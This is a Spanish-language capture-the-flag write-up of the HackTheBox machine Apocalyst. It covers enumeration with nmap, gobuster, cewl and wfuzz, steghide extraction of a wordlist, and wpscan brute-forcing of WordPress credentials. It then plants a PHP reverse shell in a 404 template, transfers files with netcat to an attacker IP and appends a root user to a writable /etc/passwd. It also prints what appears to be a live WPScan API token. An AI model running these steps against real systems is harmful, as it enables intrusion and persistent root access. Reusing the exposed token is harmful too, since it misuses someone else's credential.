Write-Up Apocalyst

Autor: https://github.com/AndrewSthephen23

Write-Up Apocalyst

Enumeración

nmap -sV -sC 10.10.10.46

image.png

Revisé la página web, pero en la página principal no encontré nada útil.

image.png

He añadido apocalyst.htb a /etc/hosts

image.png

Ahora volví a la página web, y ahora añadido la IP a /etc/hosts la página web se ve diferente.

image.png

Después de esto inicié gobuster con el fin de enumerar la página web para encontrar archivos y directorios. Estamos recibiendo una gran cantidad de salida, y todos son 301 código de error.

gobuster dir -u http://10.10.10.46/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

image.png

Lo siguiente que hice fue usar: cewl. Con el fin de raspar la página web y utilizar eso como lista de palabras para mi wfuzz.

cewl http://apocalyst.htb/ > cewl-lista-de-palabras.txt

Para el propósito de este escrito hice la lista de palabras más pequeña con el fin de hacer una captura de pantalla más limpia.

wfuzz -w cewl-lista-de-palabras.txt --hw 32 --hc 312 http://apocalyst.htb/FUZZ

image.png

Podemos ver que 1 directorio es un poco más grande que el resto de los directorios. view-source:http://apocalyst.htb/Rightiousness/

image.png

Vemos un comentario dentro de la fuente de la página:<!-- needle ->

Primero, descargué la imagen.

wget http://apocalyst.htb/Rightiousness/image.jpg

image.png

Ahora quiero extraer la información que contiene la imagen.

steghide extract -sf imagen.jpg

image.png

Lista de palabras

Ahora tenemos un nuevo archivo: list.txt

image.png

Cuando abrimos la página web, vemos que es una página de WordPress. http://apocalyst.htb/wp-login.php

image.png

Empecé a enumerar WordPress usando una herramienta llamada: wpsscan

wpscan --url http://apocalyst.htb/ -e u,vp --api-token "DxOoX59K0S3IwaCBOxBafAlUa1vJCs9JxLuFcKkCwms"

image.png

Hemos encontrado 1 usuario:Falaraki

Explotacion

Ahora tenemos un nombre de usuario, y tenemos una lista de palabras personalizada(list.txt)wpscan --url [http://apocalyst.htb/](http://apocalyst.htb/) -U nombredeusuario.txt -P list.txt --api-token "DxOoX59K0S3IwaCBOxBafAlUa1vJCs9JxLuFcKkCwms"

image.png

Ahora tenemos unas credenciales válidas:falaraki:Transclisiation

Entrar en WordPress

image.png

Obteniendo Shell de Usuario Luego vamos a Apariencia > editor > Plantilla 404

image.png

Plantilla 404 sin editar.

image.png

Cambiamos la plantilla con un código php rev shell. https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

image.png

Luego vamos a una página que no existía, ahora tenemos un shell.

image.png

Obteniendo el usuario Falaraki Liste los directorios en /home/falaraki

ls -al

image.png

Vi un directorio habitual llamado: .secret

Lee el contenido de .secret

cat .secret; echo

image.png

Esto es base64 así que necesitamos decodificarlo.

echo "S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=" | base64 -d; echo

image.png

La contraseña:Y0uAINtG37TiNgTH!sUzersP4ss

Inicio de sesión con SSH Ahora inicié sesión en ssh con las siguientes credenciales:Falaraki:Y0uAINtG37TiNgTH!sUzersP4ss

image.png

whoami && ifconfig && cat usuario.txt; echo

image.png

Post-Explotacion

Despues de obtener acceso a nivel de usuario al sistema comencé a ejecutar un script de enumeración llamado: lse.shRecurso: https://github.com/diego-treitos/linux-smart-enumeration

Transfiriendo el archivo lse.sh

Sistema Kali:nc -lnvpo 1234 < lse.sh

Sistema destino:nc -nv 10.10.14.12 1234 > lse.sh

image.png

Y como ejecuto el script.

bash lse.sh -l 0

Este script de enumeración descubrió que podemos escribir en /etc/passwd. Eso significa que podemos añadir un nuevo usuario root

image.png

Con el siguiente comando añadimos un nuevo usuario root.echo "IceL0rd:safFH5uFKHzvk:0:0:root:/root:/bin/bash" >> /etc/passwd

image.png

image.png

whoami; ifconfig; cat root.txt; echo

image.png